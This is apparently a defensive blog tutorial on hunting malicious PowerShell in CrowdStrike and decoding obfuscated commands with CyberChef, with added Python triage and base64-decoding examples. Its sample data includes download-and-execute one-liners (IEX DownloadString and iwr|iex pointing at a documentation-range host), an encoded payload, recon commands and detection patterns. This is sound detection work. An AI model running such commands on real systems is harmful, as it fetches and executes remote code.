PowerShell is an amazing tool for scripting and developing automation. It has helped me save so much time in setting up rules, policies, software, and small details on an enterprise level. I'm going to walk through the hunting process for investigating malware on the network using the PowerShell hunt in CrowdStrike.
CrowdStrike is an amazing company that has been around for some time. While they do catch a lot of malicious activity, they can't possibly catch everything, as each environment is different, and understanding what is and isn't malicious falls on the security engineers and IT professionals. This is why it is important to stay vigilant and understand your organization's environment so that you can find malicious activity.
Within CrowdStrike, click the three-lines icon, select Investigate, and select "PowerShell hunt". This will take you to the PowerShell hunting window.
Once you get here you will see a lot of information. Much of it will be non-malicious PowerShell scripts. Before we begin, there are several things CrowdStrike points out to keep in mind.
What to look for in PowerShell
Examples of suspicious activities in PowerShell that warrant further investigation include:
- Downloaded files, especially from outside your organization. Attackers frequently download late-stage malware and tools from sites such as GitHub, or from their own staging infrastructure.
- Obfuscated or encoded scripts. Administrators very rarely have a need to obfuscate their scripts, as this greatly complicates future maintenance and troubleshooting. Seeing PowerShell scripts that are encoded merits a deeper look.
- Unusual command line arguments. PowerShell provides a wide range of command line arguments that allow administrators to set the execution context and control how PowerShell operates. -ExecutionPolicy Unrestricted allows scripts to run without standard OS restrictions. Other arguments can suppress user warnings or dialogs that might otherwise alert a user or administrator to an intrusion. These arguments are rarely used in most enterprise environments.
- Repeated use of local informational tools. Attackers frequently use local commands such as whoami, hostname, ping, netstat, and similar commands during their initial reconnaissance, in order to orient themselves after an initial intrusion. On the other hand, it is much rarer for an authorized administrator to do these things, as they typically know what systems they are accessing and the account context they are working under.
Once you have an idea of what you are looking for, you will be able to find true positive activity more easily. Keep in mind that not everything is malicious, and that malicious PowerShell activity is not common in any environment.
The first thing you want to do when you get to the following window is to look at the Command Line information. This will give you an indication of what to filter out when parsing through the PowerShell logs. Below is an example to introduce the concept.
I have edited out the information, but in the Command Line information you will see what the PowerShell commands are doing. If you are new to threat hunting, you will have to start from scratch on investigating everything until you get an idea of what is on your network. If you are somewhat familiar with your network environment, you may know what you are seeing in the command line section of the investigation.
The basic idea is that you parse through all the data using the filtering conditions it suggests, but tailored to the software you use in your environment.
CommandLine!="*Microsoft Monitoring Agent*" AND CommandLine!="*Microsoft\SCCM\*"
The above filtering condition is something you might use to filter out the Microsoft Monitoring Agent and Configuration Manager PowerShell scripts you might find in a Windows environment. Keep adding exclusionary criteria until you end up with rare, strange PowerShell commands you can't explain. Then investigate those until you conclude they are false positives or true positives, and plan your actions accordingly.
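The filter-then-rank workflow above, and the four indicator categories from the list earlier in the post, as an added Python example (not code from the post, from CrowdStrike, or from any product): it applies the same wildcard exclusions offline to a handful of constructed command lines, such as ones you might export from the hunt view, and ranks what is left by how many indicators fire. The sample command lines, the 203.0.113.5 address (a documentation range) and the base64 blob are all made up for the example, and the indicator patterns are starting points to tune, not a vetted rule set.

```python
import fnmatch
import re

# Exclusion filters in the same wildcard style as the CrowdStrike query above;
# extend this list with the software that is normal in your own environment.
EXCLUSIONS = [
    "*Microsoft Monitoring Agent*",
    "*Microsoft\\SCCM\\*",
]

# One indicator pattern per bullet in the "what to look for" list. These are
# constructed for this example; tune them to your environment.
INDICATORS = {
    "download": re.compile(
        r"(?i)(?:DownloadString|DownloadFile|Invoke-WebRequest|\biwr\b|Start-BitsTransfer|https?://)"),
    # -e, -ec, -en, -enc and -encodedcommand are all accepted spellings of -EncodedCommand
    "encoded": re.compile(r"(?i)(?:(?<!\S)-e(?:n(?:c(?:odedcommand)?)?|c)?\s|FromBase64String)"),
    "unusual_args": re.compile(
        r"(?i)(?:-ExecutionPolicy\s+(?:Unrestricted|Bypass)|-WindowStyle\s+Hidden|-W\s+Hidden|-NonInteractive)"),
}
RECON_TOOLS = re.compile(
    r"(?i)\b(whoami|hostname|ping|netstat|ipconfig|systeminfo|nltest|net\s+(?:user|group|view))\b")

# Constructed sample command lines modelled on what the hunt view shows.
SAMPLE_COMMAND_LINES = [
    r'powershell.exe -ExecutionPolicy Bypass -File "C:\Program Files\Microsoft Monitoring Agent\Agent\Health.ps1"',
    r'powershell.exe -NoProfile -File C:\ProgramData\Microsoft\SCCM\Scripts\Collect-Inventory.ps1',
    r'powershell.exe -NoProfile -Command "Get-Service | Where-Object Status -eq Stopped"',
    r'powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQA',
    "powershell.exe -Command \"IEX (New-Object Net.WebClient).DownloadString('http://203.0.113.5/update.ps1')\"",
    'cmd.exe /c powershell.exe -c "whoami; hostname; ipconfig /all; netstat -ano"',
]


def is_excluded(command_line, exclusions=EXCLUSIONS):
    """True when the command line matches any known-good wildcard filter."""
    return any(fnmatch.fnmatchcase(command_line, pattern) for pattern in exclusions)


def score(command_line):
    """Return the names of the indicators that fire for one command line."""
    hits = [name for name, pattern in INDICATORS.items() if pattern.search(command_line)]
    tools = {m.group(1).lower() for m in RECON_TOOLS.finditer(command_line)}
    if len(tools) >= 2:  # "repeated use" of local informational tools, not a single ping
        hits.append("recon:" + ",".join(sorted(tools)))
    return hits


def triage(command_lines, exclusions=EXCLUSIONS):
    """Drop known-good lines first, then rank the rest by how many indicators fire."""
    remaining = [(cl, score(cl)) for cl in command_lines if not is_excluded(cl, exclusions)]
    remaining.sort(key=lambda item: len(item[1]), reverse=True)
    return remaining


if __name__ == "__main__":
    for command_line, hits in triage(SAMPLE_COMMAND_LINES):
        print(f"{len(hits)} indicator(s) {hits}: {command_line}")
```

Note that the Microsoft Monitoring Agent line carries -ExecutionPolicy Bypass and would have scored if the exclusion had not removed it first; that is the point of building the exclusion list before looking at indicators. A zero-score line still surfaces at the bottom, because "nothing fired" only means none of these patterns matched, not that the command is explained.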
Be sure to pay attention to obfuscation of PowerShell commands. Sometimes it is as simple as base64 encoding; other times a command can be obfuscated multiple times. Pay particular attention to the indicators below to help you assess this.
They will tell you what is obfuscated and (sometimes) how. You can take an obfuscated PowerShell command and plug it into CyberChef to get an idea of what to look for.
If you haven't used CyberChef before, it's a great tool that has helped me discover new and interesting encoded commands. You can go to https://cyberchef.org to see what it is like.
When you input encoded commands, you can select the encoding that was used in order to decode them. For example, I was able to decode the following base64 message and find out that a PowerShell script was going to download another PowerShell script from a website.
This is just one example of the power CyberChef has. It can go much deeper than the example I gave. You just have to experiment with it and see how it can help you.
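The decoding step described above, as an added Python example (not from the post and not CyberChef's code): it pulls the base64 blob out of an -EncodedCommand argument or a FromBase64String() call, decodes it, and repeats on the result until no further layer is found, which covers the "obfuscated multiple times" case with a depth cap. The two sample command lines are constructed for this example; the first decodes to "iwr http://203.0.113.5/a.ps1|iex" (203.0.113.0/24 is a documentation range, so the URL points at no real host), and the second wraps the base64 of "whoami". The character-set heuristic is an assumption of this example: -EncodedCommand payloads are UTF-16LE, so every second byte of ASCII text is zero, while FromBase64String() payloads are usually UTF-8.

```python
import base64
import re

# Constructed sample: an -EncodedCommand blob (UTF-16LE) that decodes to a download-and-run
# one-liner pointing at a documentation-range address.
ENCODED_SAMPLE = (
    "powershell.exe -NoP -W Hidden -Enc "
    "aQB3AHIAIABoAHQAdABwADoALwAvADIAMAAzAC4AMAAuADEAMQAzAC4ANQAvAGEALgBwAHMAMQB8AGkAZQB4AA=="
)

# Constructed sample: an inline FromBase64String() layer ("d2hvYW1p" is base64 of "whoami").
INLINE_SAMPLE = (
    "powershell -c \"iex([Text.Encoding]::UTF8.GetString("
    "[Convert]::FromBase64String('d2hvYW1p')))\""
)

# -EncodedCommand may be abbreviated (-e, -ec, -en, -enc); the blob is the next token.
ENC_FLAG_RE = re.compile(r"(?i)(?<!\S)-e(?:n(?:c(?:odedcommand)?)?|c)?\s+([A-Za-z0-9+/=]{8,})")
B64_CALL_RE = re.compile(r"(?i)FromBase64String\(\s*['\"]([A-Za-z0-9+/=]+)['\"]\s*\)")
URL_RE = re.compile(r"(?i)\bhttps?://[^\s'\"<>)|;]+")


def decode_blob(blob):
    """Base64-decode one blob and choose UTF-16LE or UTF-8 from the byte pattern.

    Heuristic (assumption of this example): if at least a quarter of the odd-position
    bytes are zero, the text is UTF-16LE, which is what -EncodedCommand expects.
    """
    raw = base64.b64decode(blob, validate=True)
    if len(raw) >= 2 and len(raw) % 2 == 0 and raw[1::2].count(0) >= len(raw) // 4:
        return raw.decode("utf-16-le", errors="replace")
    return raw.decode("utf-8", errors="replace")


def peel_layers(command_line, max_depth=5):
    """Return the command line followed by each decoded layer, outermost first.

    Stops when no blob is found, the blob is not valid base64, or max_depth is hit,
    so a payload that decodes to itself cannot loop forever.
    """
    layers = [command_line]
    current = command_line
    for _ in range(max_depth):
        match = ENC_FLAG_RE.search(current) or B64_CALL_RE.search(current)
        if not match:
            break
        try:
            decoded = decode_blob(match.group(1))
        except ValueError:  # binascii.Error (bad padding / characters) is a ValueError
            break
        layers.append(decoded)
        current = decoded
    return layers


def extract_urls(layers):
    """Collect every URL seen at any layer; these are the download sources to check."""
    urls = []
    for layer in layers:
        for url in URL_RE.findall(layer):
            if url not in urls:
                urls.append(url)
    return urls


def summarize(command_line):
    """Number of layers decoded, the innermost text, and any URLs found along the way."""
    layers = peel_layers(command_line)
    return {"layers": len(layers) - 1, "final": layers[-1], "urls": extract_urls(layers)}


if __name__ == "__main__":
    for sample in (ENCODED_SAMPLE, INLINE_SAMPLE):
        info = summarize(sample)
        print(f"{info['layers']} layer(s) decoded -> {info['final']!r}; urls={info['urls']}")
```

In CyberChef the equivalent recipe for the first sample is "From Base64" followed by "Decode text" with UTF-16LE; the script just makes that choice from the bytes so you can run it over a whole export. Whatever decodes, the URL list is what you take to the next step of the hunt, since the post's own example ended in a script fetching another script from a website.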
I really wanted to focus on understanding how to hunt PowerShell scripts within CrowdStrike while using CyberChef. My hope is that this will help you become better at recognizing threats within your environments. This should at least point you in the right direction for basic threat hunting and investigation of PowerShell scripts in CrowdStrike and your environment.